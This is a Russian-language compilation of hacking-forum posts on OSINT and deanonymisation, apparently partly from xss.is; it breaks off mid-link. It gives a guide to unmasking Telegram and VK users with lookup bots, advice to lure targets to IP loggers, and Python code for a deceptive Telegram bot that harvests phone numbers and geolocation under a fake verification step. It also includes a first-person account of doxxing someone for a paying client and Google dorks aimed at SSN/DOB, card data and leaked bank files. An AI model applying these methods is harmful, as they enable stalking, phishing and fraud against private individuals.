•Blockcypher — информация о транзакциях;
•Intelx — найдет информацию о
Bitcoin адресе;
•Maltego — визуальное представление и
анализ транзакций;
•OXT — визуальное представление и анализ транзакций в
браузере;
**ETH.
• **Etherchain — анализ Ethereum адреса;
•Etherscan — анализ Ethereum адреса;
•Blockchair — информация о транзакциях;
Другое:
• Coin360
• https://bitref.com/
• https://etherscan.io/
• https://xmrchain.net/
• https://tokenview.com/
• https://blockchair.com/
• https://www.etherchain.org/
• https://bitcoinwhoswho.com/
• https://localmonero.co/blocks
• https://www.blockonomics.co/
• https://www.livecoinwatch.com/
• https://www.walletexplorer.com/
• https://explorer.bitcoin.com/bch
• https://www.walletexplorer.com/
• https://www.blockchain.com/explorer
**Поисковики.
• **Not Evil — Ищет там, куда Google,
«Яндексу» и другим поисковикам вход закрыт в принципе.
•Yacy — децентрализованная поисковая система,
работающая по принципу сетей P2P;
•Pipl — система, предназначенная для поиска
информации о конкретном человеке;
•Wolfram Alpha — вычислительно-поисковая
система;
•Carrot2 — определяет объекты или
категории привязанные к слову в поисковом запросе;
•Boardreader — поисковик по форумам;
•Searchcode — поиск по коду в открытых
репозиториях;
•Intelx — найдет по email, доменам, URL-адресам, IP-
адресам, CIDR, btc, хешам IPFS и т.д.
•Publicwww — поиск по исходному коду страниц,
можно искать ники, почты, трекеры, кошельки, адреса сайтов и т.д.
•Kribrum — поиск по социальным сетям;
•Secapps — автоматический поиск и
создание карт взаимосвязей;
•Occrp — поиск по базам данных, файлам,
реестрам компаний и т.д.
автор SEAdm1n
канал @Social_engineering
Get shodan.io membership free
Login your shodan account then visit this link: https://shodan.io/sans
You will get 100 export credits
This would be my Official retirement from Osint and Data dump posting
It was pleasure sharing these with you Peeps . Hope you will use them for good
and have fun at the side
Link : https://anonfiles.com/C0wclao4zc/last_osint_resource_txt
Автор:ShadowHawk
Для форума: xss.is
Привет! Все мы знаем, что многие злоумышленники скрываются в Telegram, уверяя себя в полной безопасности, как об этом говорил Пашок. Но мы-то знаем, что это не так. Сегодня я хочу показать, как можно собрать данные о интернет-хулигане, который сидит в этом недо анонимном мессенджере.
Каждый Telegram-аккаунт имеет уникальный идентификатор — ID. Этот ID можно получить разными способами, но один из самых удобных — через Telegram Desktop. Для этого нужно перейти в Настройки → Продвинутые настройки → Экспериментальные настройки и включить опцию Show Peer IDs in profile. После этого, зайдя в любой профиль, вы увидите его уникальный ID. Это один из способов, но существует и множество других.
Первое, что нужно сделать — это проанализировать профиль пользователя. Что он из себя представляет?
Для поиска можно использовать Google и Яндекс. Возможно, вы наткнетесь на аккаунт пользователя на каком-то форуме или в соцсетях. Но для более глубокого поиска полезно использовать специализированные инструменты, такие как Snoop Project. Я уже упоминал этот инструмент в своих постах, но для полноты картины оставлю ссылку:
Кроме Snoop Project , существуют и другие решения для поиска по никнейму:
Что касаемо поисковиков? Моя рекомендация: все, что вы получили в результате
сбора и анализа данных, прогоняйте через поисковики, будь то описания или
username пользователя. На моей практике лучше всего себя показал Yandex.
Можно попытаться обнаружить что-то интересное, используя специализированные
поисковые инструменты, например lyzem.com , который ищет информацию по
открытым чатам, каналам, ботам в Telegram и материалам на telegra.ph.
Ссылка на lyzem : https://lyzem.com/
Также есть море подобных поисковиков:
Telegago - найдет упоминание в описании каналов/групп, а также сообщениях в группах и постах каналов.
Ссылка на Telegago :
https://cse.google.com/cse?cx=006368593537057042503:efxu7xprihg#gsc.tab=0
Commentgram - Ещё один поисковик для Telegram с ограниченным функционалом, предоставляющий только возможность сортировки результатов по дате и релевантности.
Ссылка на Commentgram :
https://cse.google.com/cse?cx=006368593537057042503:ig4r3rz35qi#gsc.tab=0
Kribrum - Можно использовать не только для поиска в Telegram, но и для поиска на различных платформах и в социальных сетях.
Ссылка на Kribrum : https://kribrum.io/
Как найти похожие аккаунты по username в Telegram
Не могу не упомянуть фишку, предоставленную самим Павлом Дуровым. Если у вас есть username (например, "durov"), вы можете просто ввести его в поисковую строку Telegram и получить аккаунты или каналы с похожими именами. Это может быть полезно, в случае если у человека на двух аккаунтах похожие username.
Теперь поговорим о самом популярном боте для сбора информации — это "Глаз Бога". Этот бот собирает данные о своих пользователях разными способами. Один из очевидных — это авторизация по номеру телефона. При активации бота он попросит вас поделиться номером, который затем попадает в базу Антипова.
Ещё одна интересная фишка связана с оплатой. Когда вы пополняете баланс через карту, система может попросить ввести email для отправки чека. После этого ваш email добавляется в базу, и он начинает отображаться в поиске, связанном с вашим Telegram-аккаунтом. Умные люди уже догадались, как можно оставить фейковый след, чтобы скрыть свою личность.
Недавно команда Антипова добавила новую функцию. Теперь "Глаз Бога" может показать аккаунты, которые ранее использовали тот или иной username. Например, если пользователь на старом аккаунте использовал имя petrpetrovich1992, а потом сменил его, бот покажет ID старого аккаунта. Это полезно, ведь старая информация часто бывает хорошей зацепкой.
Также в процессе поиска вы можете увидеть изменения в профиле, такие как смена username или имени. Вы можете найти старые аккаунты, поискав в интернете, используя методы, описанные выше. А то есть, пробовать вбить каждый username и проверять, не стоял ли он ранее на каком-то аккаунте.
Когда вы меняете имя в своем Telegram-профиле, "Глаз Бога" может занести это имя в свою базу данных, особенно если вы авторизованы в их системе. Это имя может попасть в раздел "Возможные имена", который связан с вашим номером телефона. К чему я это веду? К тому, что через функцию "Поиск в записных книжках" можно сделать одну хитрость! Например, если пользователь изменил свой никнейм в Telegram на интернет-имя, скажем, "petrpetrovich", можно попробовать воспользоваться этой функцией.
Как она работает? Функция по введенному имени совершает поиск по базе и проверяет раздел "Возможные имена". Как это сделать? Нужно отправить имя, например, "PetrPetrovich", боту — и активировать "Поиск в записных книжках" с опцией "Искать везде". И вот, если пользователь когда-то установил этот ник в своем Telegram, и система "Глаз Бога" занесла его в раздел "Возможные имена" по номеру телефона, то в результате поиска мы можем получить его номер телефона.
Ссылка на Глаз Бога: https://eyeofgod.bot/
Telesint — это бот, который позволяет проверять, в каких публичных чатах состоит тот или иной пользователь. Зачем это нужно, когда хочется найти определённого юзера? Например, пользователь может состоять в чате своего города, или же, после начала конфликта в 2022 году, украинцы начали массово переезжать в страны Европейского Союза. Часто в своей работе я замечал, что люди участвуют в чатах вроде «Украинцы в Словакии».
В боте есть поиск по имени. Искать можно как полное совпадение (с учётом регистра), так и по фрагменту. Однако стоит учитывать, что частое использование одного и того же имени может привести к появлению лишних результатов.
Сам бот: @telesint_bot
Старый добрый бот для поиска старых ников юзера. База не такая уж большая, но в некоторых случаях может выручить
Сам бот: @SangMata_BOT
Бот с большой базой и широким функционалом!
Бесплатные команды:
Премиум команды:
Сам бот: @tgdb_bot
Бот, который совершает поиск в открытых источниках, показывает, в каких источниках можно обнаружить какую-либо информацию о Telegram-аккаунте.
Сам бот: @UniversalSearchEasyBot
Этот сайт совершает поиск по базам:
Ссылка на leakedtg: https://d4n13l3k00.ru/#leakedtg
Бот показывает, в каких группах писал пользователь Telegram. Чтобы начать поиск, нужно отправить одно из трёх:
Сам бот: @where_a_person_wrote_bot
Это специализированный бот для поиска пользователей в Telegram. Он собирает и анализирует исторические данные о пользователях, такие как их участие в различных группах, активность в сообщениях и изменения имен. Благодаря этому инструменту можно отслеживать, в каких группах и каналах был замечен пользователь, а также просматривать его поведение на протяжении времени.
Сам бот: @US2Telescan_Bot
Insight — бот для анализа интересов и активности пользователей Telegram. Он собирает информацию о контактах, их активности и интересах, сортируя данные по категориям, таким как «активные», «горячие» и «все». Также бот отслеживает супергруппы и ссылки, которыми делился пользователь.
Этот инструмент подходит для тех, кто хочет узнать больше о поведении пользователей и их интересах.
Сам бот: @sght_bot
Fanstat — это мощный инструмент для сбора и анализа данных о пользователях Telegram. Он ищет сообщения, которые были отправлены пользователем в чатах, и анализирует различные параметры, такие как криптовалютные кошельки, возраст, интересы и другие данные.
Особенности:
В базе этого бота находится огромное количество данных: 754 млн пользователей, 28 млн чатов и 38 млрд сообщений. Это мощный инструмент для исследования активности пользователя в Telegram.
Сам бот: @funstat_gobot
TelegramOnlineSpy — это инструмент для отслеживания времени появления пользователей в Telegram. Это полезный инструмент для тех, кто ищет активных пользователей и хочет понять, когда они находятся в сети.
Ссылка на TelegramOnlineSpy: https://github.com/Forichok/TelegramOnlineSpy
Surftg_bot — это инструмент для поиска информации по интересующим словам или фразам в Telegram. Бот сканирует платформу на наличие совпадений и отправляет вам результаты, включая ссылки на оригинальные источники.
Основные функции:
Этот бот полезен для тех, кто ищет специфическую информацию по ключевым словам в Telegram.
Сам бот: @surftg_bot
Unamer — это инструмент, который предоставляет подробную информацию о пользователях Telegram. Он позволяет отслеживать изменения имени и фамилии пользователей, а также историю использования username. Бот отслеживает, кто и когда использовал тот или иной username, а также предоставляет подробности о владельцах аккаунта.
Основные функции:
Этот бот полезен для людей, которые ищут подробности о пользователях и их активности на протяжении времени.
Сам бот: @profile_history_bot
Если вы хотите деанонимизировать владельца Telegram-канала, то существует несколько методов, которые могут помочь в сборе данных о нем:
Если Telegram-канал был создан до 2017 года, следуйте инструкции: <https://telegra.ph/How-to-find-the-owner-and-administrator-of-a-Telegram- channel-11-02>
Если другие методы не дали результатов, можно использовать социальную инженерию. Например, можно попытаться заманить цель на IP-логер. Заманить можно под различными предлогами, всё зависит от вашего клиента. К примеру, это может быть скриншот об оплате чего-либо. Но, как правило, жулики сидят как минимум с VPN, но попробовать стоит
Ссылки на IP-логеры:
Хотел бы поделиться примером кода бота-ловушки, который собирает личные данные пользователя, такие как пол, , номер телефона и геолокацию, под предлогом верификации. После получения информации данные сохраняются в файл.
Python:Copy to clipboard
from telegram import Update, ReplyKeyboardMarkup, KeyboardButton, ForceReply
from telegram.ext import Application, CommandHandler, MessageHandler, filters, CallbackContext
import os
DATAFILE = 'userdata.txt'
def save_data(user_data):
with open(DATAFILE, 'a') as f:
f.write(user_data + '\n')
async def start(update: Update, context: CallbackContext) -> None:
keyboard = [
[KeyboardButton("Мужчина")],
[KeyboardButton("Девушка")]
]
reply_markup = ReplyKeyboardMarkup(keyboard, one_time_keyboard=True, resize_keyboard=True)
await update.message.reply_text("Привет! Ты мужчина или девушка?", reply_markup=reply_markup)
async def gender_handler(update: Update, context: CallbackContext) -> None:
user_gender = update.message.text
context.user_data['gender'] = user_gender
await update.message.reply_text(f"Ты {user_gender}. Сколько тебе лет?")
async def age_handler(update: Update, context: CallbackContext) -> None:
user_age = update.message.text
context.user_data['age'] = user_age
keyboard = [
[KeyboardButton("Поделиться номером телефона", request_contact=True)],
[KeyboardButton("Поделиться геолокацией", request_location=True)]
]
reply_markup = ReplyKeyboardMarkup(keyboard, one_time_keyboard=True, resize_keyboard=True)
await update.message.reply_text("Пожалуйста, поделитесь вашим номером телефона и геолокацией для верификации.", reply_markup=reply_markup)
async def contact_handler(update: Update, context: CallbackContext) -> None:
contact = update.message.contact
phone_number = contact.phone_number
user_id = update.message.from_user.id
user_data = f'User ID: {user_id}, Gender: {context.user_data["gender"]}, Age: {context.user_data["age"]}, Phone Number: {phone_number}'
save_data(user_data)
await update.message.reply_text(f"Спасибо! Ваш номер телефона: {phone_number}. Ваша верификация завершена.")
async def location_handler(update: Update, context: CallbackContext) -> None:
location = update.message.location
latitude = location.latitude
longitude = location.longitude
user_id = update.message.from_user.id
user_data = f'User ID: {user_id}, Gender: {context.user_data["gender"]}, Age: {context.user_data["age"]}, Latitude: {latitude}, Longitude: {longitude}'
save_data(user_data)
await update.message.reply_text(f"Спасибо! Ваша геолокация: широта {latitude}, долгота {longitude}. Ваша верификация завершена.")
def main() -> None:
application = Application.builder().token("").build()
application.add_handler(CommandHandler("start", start))
application.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, age_handler))
application.add_handler(MessageHandler(filters.TEXT & filters.Regex('^(Мужчина|Мальчик)$'), gender_handler))
application.add_handler(MessageHandler(filters.CONTACT, contact_handler))
application.add_handler(MessageHandler(filters.LOCATION, location_handler))
application.run_polling()
if __name__ == '__main__':
main()
Спасибо за внимание! Хотел бы услышать мнения людей ниже. С кодом помогал Jungerster.
Это очень нужный навик это голова в нашем деле и очень нужный аспект!
**
Социальную инженерию -** нужно изучать как и для защиты так и для атакки но мы же будем её сегодня разбирать конкретно для атаки :
Точное определние термина:Социальная инженерия — это метод манипуляции
людьми с целью получения конфиденциальной
информации или доступа к системам, обходя технические меры безопасности. В
этом процессе
злоумышленники используют психологические трюки, доверие и человеческие
слабости для того,
чтобы жертва сама выдала важные данные (например, пароли, банковскую
информацию и т.д.)
или совершила действия, полезные для атакующего.
Простыми словами:Cоциальная инженерия — это игра на человеческих
слабостях. В этот процесс
вовлекается вся психика человека: его эмоции, воспоминания, желания — всё. Это
даёт много
путей и лазеек, чтобы затем использовать информацию в своих целях, например,
подтвердить
какие-то данные. Даже если информации недостаточно, и человек анонимен, с
помощью
социальной инженерии можно добыть то, что нужно.
Ироничный пример: Многие в фильмах, сериалах, да и в аниме мечтали
подчинить других людей, и часто главный
герой или даже посредственный персонаж, выдавая себя за некоего манипулятора,
управлял
всеми "под свою дудку". Особенно это видно в фантастике, где как раз и
показывают аля
социальную инженерию.
Перед началом хочу сделать очень важное замечание!
Мой дорогой читатель: запомни одно! Сохраняй всё, что видишь. Если у тебя
диалог с человеком, делай скриншоты,
добавляй его сообщения в избранное, фиксируй даже изменения его аватарок. Веди
целое досье из его аватаров, никнеймов — абсолютно всего. Если вы общаетесь,
записывай экран. Это очень важный аспект. Запомни: при любых обстоятельствах,
если ты
вступаешь в личный диалог с человеком, веди запись. Чуть позже объясню, зачем
это
нужно
Начнем!
Возьмём во внимание простую уловку, звучит легко и просто тупого губят деньги
только немного усовершенствованную. Честно, за весь мой стаж работы я был
поражён, когда раскрывал личность ребят,которые долгое время оставались
анонимными. не используя базы данных и прочее.
15.07.2024 "Форбаев ": личность которая была раскрыта по этому методу:
13.07.2024 мне написал некто Ярослав с заказом на поиск личности с ником
'Форбаев'.
При заходе на его аккаунт в Telegram не было ничего, кроме стандартной
буквы 'Ф'.
Во-первых, важно помнить: перед любым поиском, будь это заказ или другая ситуация, где участвуют посторонние личности, всегда спрашивай, зачем и почему они ищут человека. Что произошло? Спрашивай абсолютно всё и не забывай сохранять информацию. Это поможет тебе визуализировать общую картину.
Например, если человек говорит, что его обманули на серьёзной кибераферной сделке, это может указывать на то, что он, скорее всего, не школьник. Ведь обычно школьники не лезут в такие серьёзные дела, потому что им это неинтересно. Они предпочитают более простые обманные схемы, такие как создание фейковых анкет на платформах вроде 'Дайвинчик' или мошенничество в фейковых наркошопах, где не требуется особых усилий или ресурсов. Редко школьник будет участвовать в сложных кибераферах из-за своей психологии — детям нужно всё и сразу. Но, конечно, бывают исключения. Это просто маленький пример.
Вернемся к нашей теме. На аккаунте в Telegram был лишь ник на букву 'Ф'. Для начала я пробил его и понял, что это просто аккаунт с рынка, потенциально таких как Гридди, и поиск данных по этому аккаунту не принесет мне успеха. Я начал спрашивать, где заказчика обманули и как это случилось. Он сказал, что в игре 'ГТА 5 Онлайн' на сумму 18 тысяч рублей при покупке какого-то аккаунта с админкой. Я тут же спросил, личный ли это аккаунт, и он ответил, что да.
Было бы проще, если бы у заказчика остался ник этого аккаунта, но продавец удалил переписку. Он нашёл его в одном из чатов. Что это мне дало? Чат, в котором находилась наша личность, история его сообщений и очень хорошая идея! Я тут же отправился на сайт этого ГТА-проекта, чтобы посмотреть требования для получения админки, и заметил пункт от 16 лет: обязательные аккаунты ВКонтакте, хороший микрофон и Discord. Прекрасно! Я узнал, что, возможно, он сидит в Discord и что ему больше 16. Это уже дало мне какое-то понимание для дальнейшего поиска.
Купив виртуальный номер, я создал аккаунт максимально обычного школьника по имени Антон, который хочет админку, чтобы радоваться и бегать. Для правдоподобности я написал ему днём с периодическими ошибками, чтобы не выглядеть странно, иногда с тупыми шутками, но не перебарщивал. Просто было бы странно, если бы какой-то Антоха писал тебе ночью с целью покупки аккаунта. Лишние риски нам точно не нужны, верно?
Наш персонаж мне отписал. Я соглашался на все его условия и диалоги, специально делая небольшие паузы. Зачем это? Чтобы заставить его интересоваться, он почувствовал запах денег и не на секунду не прекращал игнорить меня. Цена на аккаунт составляла 18 тысяч, что не так уж много, но это дало мне идею, что он действительно горит желанием получить эти 18 тысяч. Значит, со мной точно не какой-то взрослый дядя, а парень лет 18-19 как раз золотой возраст. Но это были всего лишь предположения.
Ты можешь так же на заметку в дальнейшем проверять людей по их интересованности и, как в моем случае, в их возрасте. В моей ситуации возраст 18-19 был оптимальным, как раз возраст студентов, которые хотят подзаработать. Ещё одна заметка: админка доступна с 16 лет, так что 18-19 — это предположение о возрасте, которое вполне подходит.
Я начал просить у него акцию, он сказал 'нет', у меня и так завтра уже купят. Ох, вот эти типичные школьные приемчики продавцов. Но мне это только в радость, ведь он начал вести свою игру со мной. Я подумал, что есть возможность получить от него какой-то кошелек и в дальнейшем получить с него информацию. Возможно, это будет Donation Alerts, но он был настойчив и утверждал, чтобы я скинул деньги чеком в Telegram. Я же сказал, что не умею пользоваться, готов скинуть на что-то другое. Его жажда денег принуждала его скинуть мне какой-то кошелек, но здравый смысл подсказывал ему, что не стоит.
Изначально он пробовал объяснить мне, как это делается, а я максимально делал вид, что неуклюж в этом плане, чтобы не допустить отказа от него. Я решил сыграть на опережение: 'Ладно, куплю тогда у другого'. Это очень важно — нужно говорить не 'ладно, я не буду покупать, а я тогда буду покупать у другого'. Это заставляет таких, как он, поддаваться на уговоры и быть готовым на всё, лишь бы получить свои деньги.
Он сказал: 'Стой-стой, может, в звонок пойдем? Я объясню тебе на демонстрации экрана'. Как же я был рад! Моя уловка сработала, и он сам мне даст возможность получить новую информацию о нём: его ник в Discord , аватарку. Плюс в Discord есть иконка старых ников, что даёт возможность всё это пропарсить и выйти на новые заметки!
Ситуация такая: мы в звонке, и я сразу же включаю запись. По голосу было слышно, что со мной парень лет 18. Его диалект был похож на тот, который часто слышен в Дагестане. Короче, со мной разговаривал парень, он был очень возбужден и заставлял меня торопиться. Я же в свою очередь вел себя спокойно, иногда тупил, и это его немного злило, но он всё равно держал спокойствие, потому что боялся потерять деньги. Я как раз добивался этого состояния.
Тут главное не перегибать. Если вывести человека на эмоции — гнев,
влюбленность — это отключает его рассудок. И наш персонаж, немного
раздраженный, начал орать: 'Ладно, заходи на демку!' В первой вкладке этот
парень случайно показал страницу со входом на свой аккаунт, где справа
виднелся его ник. Резко он закрыл эту вкладку и переключился на YouTube. Я
тоже обратил на это внимание, ведь можно было извлечь его аватарку и страну,
если он без VPN.
Над YouTube сверху отображается страна! У нашего персонажа страна была Россия. Я тут же сказал: 'Я отойду на 5 минут в туалет, сейчас приду'. Резко зашел в Яндекс , перешел на сайт этого проекта, ввел в поиск ник, который успел увидеть, и нашел аккаунт этого пользователя. Я быстро перешел в его сообщения и нашел момент, когда он подавался на админа — там и был его ВКонтакте. В самом ВКонтакте была вся информация на него: город, указанный в профиле, — Махачкала. Это дало мне понять, что он, скорее всего, валид, так как в Махачкале большой процент не русских.
Также, анализируя запись, я понял, что время в Махачкале и на записи совпадает, значит, и часовой пояс один и тот же. Вытянув его номер, я позвонил ему, и он поднял трубку на этом это стало начало его конца, а вся информация отправилась моему заказчику.
Вот такое расследование получилось!
Анализ по ВК
Возьмем в пример любую страницу:
Первое! Что я советую сделать это добавить себе INFOAPP
ТЫК
В поле поиска закидываем нашего пользователя:
Приложение выдает основную информацию о странице, которая необходима: привязан ли номер телефона, адрес страницы, ID группы, друзья и упоминания, а также дату создания страницы. Кроме того, показываются группы, которые создал пользователь. Ранее существовал сайт, как и сейчас, который называется так же. Там тоже есть свой функционал, но он уже устарел. Однако ссылку на него я оставлю:
Click to expand...
Тут есть и другой функционал по мимо поиска по группам прогоняем по всем пунктам например друзья друзей.
Так-же не забывай заходить в полезные ссылки и прокликивай каждую кнопку которая там есть:
Если вернуться к старту страницу первое что стоит сделать это виделить наш айдишник:
Дальше заходим в поисковик и делаем вот такой запрос "id"
Мой совет использовать яндекс в этом плане на много проще работает как мы
видем по этому пользователю выдало куча упоминаний даже иногда упоминания его
на каких-то форумах и это отлично так как там может быть его айпи или дамба
форума могла быть слита но сейчас не об этом.
Дальше советую пройтись по всем сайтам, которые выдали результаты по запросу на ID, и посмотреть, как выглядит эта страница с их точки зрения. Эти сайты- парсеры работают своеобразно, как архив: иногда они сохраняют страницу на нужном для нас моменте, допустим, когда у пользователя была группа или его друг в описании.
Также нужно использовать откат страницы; есть платный и бесплатный варианты.
Если говорить о бесплатном варианте, то вот он:
ТЫК. Если же говорить о платном варианте, то
это ТЫК. Существуют альтернативы, такие как Userbox, но
там базы данных работают максимально криво. Это лучшие сервисы, которые есть
сейчас среди ассортимента.
Смотри всех пользователей абсолютно ВСЕх которые тебе кажется подоздратильными
прогоняешь на откат страницы и смотришь что и как даже если страница удаленна
есть вариат найти друга из общего города или же его твинк чаще всего люди
держут кого-то нужного в подписчиках
Также не будет лишним прогнать страницу в универсальном боте: он проверит её в
архиве и предоставит тоже немного нужной информации.
ТЫК
Просто посмори какой спектор инструментов затрагивается это упрощает работу.
Если мы хотим создать удобный граф для себя и определить с какого города его
друзья то тут сошиал граф в помощь он создат группки всех взаимосвязей
допустим если у него в друзьях у пользователей общий город он создаст связь и
даже если общие учебные учереждение все это он сделает.
И тому подобное выйти на детальную статистику его аккаунта по друзьям используем ТЫК если пролесать вниз тут и так все понятно.
Так-же не будет лишным сделать такой мув скопировать айдишку и вставить её просто в поисковик в вк
Такой момент: если ты откатил страницу пользователя ВКонтакте, ищи его старые
ID и прогоняй их в поиск ВК, так как можно найти нужные нам упоминания. Старые
ID можно найти как платным, так и бесплатным способом, когда ты откатываеш
страничку. Или если у вас есть никнейм пользователя, допустим, из игры, ты
также можешь вставить его и серфить. Ну и, естественно, аналогичные действия с
обеими старыми и новыми ID вы делаете в Яндексе, прогоняя их через скобочки
"".
Также есть ещё один очень крутой сервис для анализа страниц. У него огромный
функционал: есть поиск по группам, по геолокации, по городу и друзьям.
Ознакомься, пожалуйста.
ТЫК
Такой момент ещё если на странице аватарка сделанная в фотошопе от руки щас
покажу пример:
Прогоняй её в Яндекс по фоткам. В этом Яндексе действительно хорош а вот с
лицами, очень плохо работает
ТЫК
Если есть лицо из всего что я перепробовал советую использовать финдклон
единственный еффективный поиск по лицу:
ТЫК
Если ты хочешь узнать номер телефона пользователя, используй смело ГБ. Как бы
люди ни оскорбляли глаз бога, я только не понимаю, почему его оскорбляют, ведь
это автономный бот, который парсит данные на постоянной основе и является
одним из самых перспективных.
ТЫК
Был ещё сервис, который парсил по чатам, но его недавно выкупили ГБ и внесли в
свой бот. Раньше можно было узнать, в каких чатах состоят пользователи, за 15
рублей за 2 недели.
Сейчас же это сразу встроенно при поиске в гб тут скорее минус чем + так как
за подписку за гб ты платишь дороже.
Также советую использовать Webmii. Берёшь имя и фамилию пользователя из ВК, и
идёт тотальный поиск этих данных по всему интернету во всех упоминаниях.
ТЫК
Если ты хочешь узнать когда человек был в сеты последний раз историю
активности тут на помощь придет
ТЫК
Так-же сервис который ищет друзей даже на закрытых страницах очень полезная
штука
ТЫК
Так-же не забывай серфить айди в лолзе просто берешь айди и цифровое и
буеквеное если имеется так как бд было слито, но процент пользователей которые
там сидит огромен
Ещё один инструмент который выдает номер с вкшек это детектив бот в тг
@detectivarobot
Доброго времени суток, хочу поинтересоваться у вас, с чего можно начать изучать Osint? (google dork, си это всё ясно, логическое мышление) Этим всем делом, я активно пользуюсь, но хочу выйти за рамки этого, подскажите, что стоит изучить, почитать, посмотреть? Возомжно выучить.
Учился этому в дискорде, в основном использовал социальную инженерию, osint практически не применял.
всех приветствую. как от имени пользователя в твиттере получить мыло или какие то данные? заранее спасибо.
Доброго времени суток. Мы все знаем, что существует множество инструментов для поиска данных по аккаунту в Telegram. Сегодня я бы хотел поделиться инструментами, которые мало кто использует в своей работе:
Немного в стороне от темы, но я также хотел бы поделиться поисковиками для Telegram, которые также могут быть полезны в исследованиях:
Если ли сервисы по Европе которые позволяют найти человека в соц сетях по фотографии лица , по номеру телефона, или же мессенджеру.
Поиск аккаунтов в социальных сетях по имени пользователя, электронной почте или телефону во всех социальных сетях.
Характеристики
by username, email or phone across social networks. ](https://github.com/piaolin/DetectDee)
DetectDee: Hunt down social media accounts by username, email or phone across social networks. - piaolin/DetectDee
github.com
Google Dorks в правильных руках и при грамотном использовании, будет служить вам мощным веб инструментом для поиска нужной информации, такой как SSN/DOB, номера кредитных карт, полные данные пользователя и многое другое.
Однако, многие недооценивают то, насколько этот инструмент полезен не только в арсенале IT, OSINT и ИБ спецов, но и в области работы с банками.
На связи Grizzly Manager, погнали разбираться что же такое эти "#Дорки" и с чем их едят.
Dorks in da house
Про Google Dorks знают многие, кто работает в области поиска информации. Известно, что с их помощью можно не просто отфильтровать параметры поиска, сузив выходные данные до нужных, но и сформировать конкретные запросы для поиска вплоть до уникальной базы или слитых персональных данных физического или юридического лица, например в какой-то стране.
Пример поиска конкретного файла через Dorks:
‘ ‘ ‘
“CV” OR “Curriculum Vitae” filetype:PDF “john” “doe”
‘ ‘ ‘
Разъяснение: Находим резюме с такими же именами и фамилиями в формате PDF.
Dorks in da CVVs
Да, те самые "#Дорки" спокойно используются даже для поиска инфы о картах и SSN, а не только о людях, объектах, файлах и веб страницах и всему подобного.
Думаете нам слабо? Отвечаем уверенно "нет"!
‘ ‘ ‘
intext:"ssn" / intext:"dob" / intext:"ssndob"
‘ ‘ ‘
Примечание:
Каждый "intext" - отдельный запрос. Хочешь совместить? Используй "OR".
С помощью таких запросов мы можем искать SSN/DOB везде на просторах "Всемирной Паутины".
Надо конкретнее? Используем параметр "site:" чтобы искать можно было на конкретно интересующей нас веб-странице.
‘ ‘ ‘
site: site.com intext:"SSN"
/
site: site.com intext:"cvv" intext:"credit card"
‘ ‘ ‘
Dorks in da leaks
Используя Google Dorks(всё ещё напоминаю, что это не от сленогового
американского слова
(https://en.m.wiktionary.org/wiki/Thesaurus:dork#English) "dork" -
(https://turbo.my/folder/wOkap0)😛) можно искать даже полноценные банковские
утечки, уязвимости и многое другое, что даст бесплатный поток данных.
Примечание от автора: Сверху шутка для внимательных.
Пример:
‘ ‘ ‘
site: bank.com filetype:xls OR filetype:xlsx intext:"clients" OR intext:"list"
OR intext:"confidential"
‘ ‘ ‘
Итоги ✔
Использование тех самых "#Дорков" в разнообразных вариациях может дать довольно хороший поток ресурсов для обработки. Многие данные сливаются и становятся публичными, а что попадает в сеть, то всегда можно найти. Простой в освоении, поэтому подойдёт для любого уровня пользователя, а даже опытному может дать новые источники.
Как и многие, я поигрался c новомодной нейросетью ChatGPT. Напоминаю, что это новое продвинутое поколение чат-ботов с продвинутыми возможностями. Задай любой вопрос и получишь ответ:
Давайте посмотрим, чем она пригодится в OSINT!
Итак, ChatGPT:
Как она всё это делает? Краткий технический разбор на русском языке можете прочесть здесь, а мы двинемся дальше — к использованию чат-бота в типовых для OSINT задачах. Попутно выявим и некоторые её важные особенности.
Да, и ещё кое-что. Я заметил, что многие люди не понимают, как устроена эта технология. И думают, что это ИИ (искусственный интеллект) либо всемогущий поисковой сервис. Но нет, это не так, и делать выводы о том, насколько она полезна, имеет смысл только после изучения её способностей.
Поехали!
Давайте начнём с простого.
Мда. Что-то наша нейросеть сплоховала. Напоминаю, что ChatGPT — не бездонная
база знаний, а неких механизм, "достраивающий" ответ к нашему вопросу.
Очевидно, что на русском языке она достроила ответ к слову "такси". Возможно,
она и не знает ничего про таксидермистов, так как бо льшая часть данных
для её обучения была на английском языке. Давайте зададим вопрос на нём.
Отлично, это уже похоже на правду!
Всем желающим использовать ChatGPT сразу предлагаю перейти на английский: опыт показывает, что и ответы с большей вероятностью будут правильные, и даже скорость ответа быстрее. Но ниже по тексту мы будем чаще использовать русский язык, чтобы статья была доступнее для читателей.
Что ж, давайте спросим нечто более конкретное.
Срез данных для обучения брали за 2020 год, и про меня (автора статьи) в
Интернете уже что-то было. Ответ нейросети похож на правду , но слишком
расплывчатый и местами некорректный (Форбс? Black Hat? Ах, если бы).
Заметим также, что ссылки на соцсети ChatGPT "достроил" на основании шаблонов URL. Две из трёх ссылок неправильные и не ведут на существующие страницы.
Что ж, держим в голове, что нейросеть выдаёт не единственный правильный, а вероятностный ответ. Попробуем этим воспользоваться в наших целях.
Одна из моделей процесса OSINT, которую я использовал в материалах своего
курса OSINT 101, выглядит так. Это
трёхлистник из бесконечной стрелки, показывающий три основные этапа процесса:
подготовку, сбор и обработку информации.
Давайте методично пройдёмся по каждому из них и посмотрим, чем нам может помочь ChatGPT.
На первом этапе нам нужно собрать требования (что искать?), проанализировать возможные источники (где будем искать?), составить краткий план действий.
Хорошо, когда у нас есть чёткое техзадание по поиску. Но что, если вопрос ставится максимально расплывчато? Например, стоит сотрудничать с компанией или нет. Давайте разбираться.
Неплохо. Нейросеть нам предложила проверить конкретные вещи и разложила по
полочкам. Давайте остановимся на первом пункте и попробуем углубиться в него.
В этот раз я попросил отсортировать критерии по убыванию критичности и вывести
нормальные значения. Не очень похоже, что она справилась с сортировкой, зато
она даже упоминает конкретные сайты для проверки! Погодите, тогда мы её и об
источниках информации можем спросить?
А вот он и план для проверки, не правда ли? Разумеется, по каждому пункту
можно выполнить поиск инструментов отдельно или даже вручную, но ChatGPT нам
тут сильно сокращает работу.
Кстати, в оригинальном веб-интерфейсе есть фишка генерации таблиц. Давайте опробуем конкретно её для случая, когда мы ищем для себя новые инструменты.
Так, а что делать, если мы знаем только один конкретный факт, но не понимаем,
чем придётся пользоваться в качестве источника?
Предположим, что у нас есть кусочек информации об увлечениях человека. Скажем, он фанат велосипедов.
Думаю, я бы потратил минут 10-15, чтобы найти эти сайты и понять все кейсы
использования онлайн-ресурсов для велосипедистов, так что ChatGPT нам прилично
сэкономил время! Эксперт по продуктивности Николай Сенин, из [статей
которого](https://nick-
